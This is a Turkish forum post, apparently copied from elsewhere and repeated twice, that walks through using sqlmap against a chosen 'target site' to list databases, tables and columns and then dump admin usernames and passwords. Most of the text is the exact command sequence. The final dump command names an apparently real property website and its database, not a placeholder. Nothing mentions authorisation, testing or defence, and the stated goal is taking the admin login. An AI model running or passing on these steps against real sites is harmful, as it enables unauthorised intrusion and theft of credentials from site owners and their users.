C
Crysuder
Kali linux kullanmakta iseniz zaten sisteminizde kuruludur. Ama kali linux kullanmıyorsanız aşağıdaki komut ile sisteminize indirebilirsiniz.
git clone git://git.kali.org/packages/sqlmap.git
bu komutu yazdıktan sonra terminale git bulanamadı tarzı hata alırsanız aşağıdaki komutu yazınız.
sudo apt-get install git
Ardında Sqlmap programının bulunduğu dizine geçelim.
cd sqlmap
Devam edelim.İlk olarak kendimize bir hedef site belirlememiz gerekiyor.
Belirlediğim site; ” http://hedefsite.com/ “
Sql Error: ” http://hedefsite.com/show_cat_page.php?id=3′ “
Şimdi terminale şu komutu yazalım;
python ./sqlmap.py -u "http://hedefsite.com/show_cat_page.php?id=3'" --dbs
Aşağıdaki resimdeki gibi tarama yapılıyor. Az sonra databaseleri çekmiş olacaz..
Bazen bize E/H (Evet-Hayır) sorularını sorabilir. “E” diyerek devam ediyoruz. Kırmızı çıktılar haricinde..
Resimde görüldüğü gibi databaseleri bulduk..
“information_schema” değildir hiçbir zaman bunu bilin. Şimdi aşağıdaki komut ile devam edelim.
python ./sqlmap.py -u "http://hedefsite.com/show_cat_page.php?id=3'" -D cebureal_db --tables
-D parametresinin yanında Database ismini yazıyoruz. Bu sitede ki database cebureal_db olduğu için cebureal_db yazdık. eğer database adı hacker_adana olsaydı parametremiz -D hacker_adana olurdu. –tables parametresi ile tabloları arıyoruz…
evet cebureal_db databasesinin tablolarını bulduk. Şimdi burada şu önemli; buradaki tabloların içinde admin, user adında yada bu isimlerde tablo olmazsa bunlara yakın ismi olan tabloları seçmeliyiz. Burada direk admin olduğu için admin’i seçiyoruz. Ve aşağıdaki komutu yazıyoruz.
python ./sqlmap.py -u "http://hedefsite.com/show_cat_page.php?id=3'" -D cebureal_db -T admin --columns
Aynı mantık burada da geçerli. Seçtiğimiz kolonu -T parametresinin yanına yazıyoruz..
Komutu yazıp taramanın bitmesini bekleyelim..
Evet uzun bir tarama sonucunda kolonları bulduk..
Bize lazım olan Kullanıcı adı ve şifresi. Yukarıdaki resimde bunlar bulunmakta. Şimdi seçtiğimiz kolonların isimlerini -C parametresi yanına virgülle yazıyoruz..
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db -T admin -C username,password --dump
Şimdi enter ile devam edelim. –dump komutu dataları arayacak ve bize şifreleri ve kullanıcı adlarını çıkartacak..
Not: Alıntıdır.
git clone git://git.kali.org/packages/sqlmap.git
bu komutu yazdıktan sonra terminale git bulanamadı tarzı hata alırsanız aşağıdaki komutu yazınız.
sudo apt-get install git
Ardında Sqlmap programının bulunduğu dizine geçelim.
cd sqlmap
Devam edelim.İlk olarak kendimize bir hedef site belirlememiz gerekiyor.
Belirlediğim site; ” http://hedefsite.com/ “
Sql Error: ” http://hedefsite.com/show_cat_page.php?id=3′ “
Şimdi terminale şu komutu yazalım;
python ./sqlmap.py -u "http://hedefsite.com/show_cat_page.php?id=3'" --dbs
Aşağıdaki resimdeki gibi tarama yapılıyor. Az sonra databaseleri çekmiş olacaz..
Bazen bize E/H (Evet-Hayır) sorularını sorabilir. “E” diyerek devam ediyoruz. Kırmızı çıktılar haricinde..
Resimde görüldüğü gibi databaseleri bulduk..
“information_schema” değildir hiçbir zaman bunu bilin. Şimdi aşağıdaki komut ile devam edelim.
python ./sqlmap.py -u "http://hedefsite.com/show_cat_page.php?id=3'" -D cebureal_db --tables
-D parametresinin yanında Database ismini yazıyoruz. Bu sitede ki database cebureal_db olduğu için cebureal_db yazdık. eğer database adı hacker_adana olsaydı parametremiz -D hacker_adana olurdu. –tables parametresi ile tabloları arıyoruz…
evet cebureal_db databasesinin tablolarını bulduk. Şimdi burada şu önemli; buradaki tabloların içinde admin, user adında yada bu isimlerde tablo olmazsa bunlara yakın ismi olan tabloları seçmeliyiz. Burada direk admin olduğu için admin’i seçiyoruz. Ve aşağıdaki komutu yazıyoruz.
python ./sqlmap.py -u "http://hedefsite.com/show_cat_page.php?id=3'" -D cebureal_db -T admin --columns
Aynı mantık burada da geçerli. Seçtiğimiz kolonu -T parametresinin yanına yazıyoruz..
Komutu yazıp taramanın bitmesini bekleyelim..
Evet uzun bir tarama sonucunda kolonları bulduk..
Bize lazım olan Kullanıcı adı ve şifresi. Yukarıdaki resimde bunlar bulunmakta. Şimdi seçtiğimiz kolonların isimlerini -C parametresi yanına virgülle yazıyoruz..
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db -T admin -C username,password --dump
Şimdi enter ile devam edelim. –dump komutu dataları arayacak ve bize şifreleri ve kullanıcı adlarını çıkartacak..
Not: Alıntıdır.